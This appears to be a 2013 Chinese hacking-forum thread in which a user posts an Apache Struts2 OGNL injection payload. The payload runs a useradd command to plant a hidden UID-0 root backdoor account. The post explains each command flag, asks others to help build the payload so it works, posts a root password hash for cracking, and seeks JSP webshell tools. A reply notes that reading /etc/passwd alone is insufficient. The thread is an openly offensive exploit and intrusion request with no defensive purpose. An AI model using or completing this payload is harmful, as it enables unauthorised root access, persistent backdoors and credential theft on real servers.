求解? linux ,解密
本帖最后由 xyhacker 于 2013-12-12 01:05 编辑?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char,%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpervletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Struts漏洞
{'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'},网页直接执行, 需要添加‘’你懂的。
这段为命令执行
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof//在自己的linux上面成功运行,测试拥有root权限
命令解释
useradd 添加用户
-p `openssl passwd -1 -salt 'lsof' admin` 这个里面的指的是设置用户的密码,里面的lsof差不多是密钥之类的,可以随便写, admin是明文密码
-u 0 -o 添加一个uid为 0的用户 就相对于root级别的了
-g root -G root 将用户添加到root组
-s /bin/bash 指定新建用户的shell路径
-d /usr/bin/lsof 新建用户的主目录,可以自己定义
lsof 新建的用户的用户名
如果执行察看一个文件那么就是
'cat', '/etc/passwd' 就可以用网页的方式查看直接爆出用户文件
,那么直接添加一个用户讷?求各为大大构造下,不会构造
另外
root:$1$j/hv8gkb$p2R4pZgXGu8O0sd3CR56Q0:
求解密
jsp 大马不解析,听说有菜刀, 求这方面的资料
我顶, 问题还木有解决,不能睡 :'(:'(:'(:'(:'(:'(:'(:'(:'(:'(:'(:'( 光是一个'cat', '/etc/passwd' 是不行的 90_ 发表于 2013-12-12 09:23 static/image/common/back.gif
光是一个'cat', '/etc/passwd' 是不行的
对呀,所以这个语句求构造
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
页:
[1]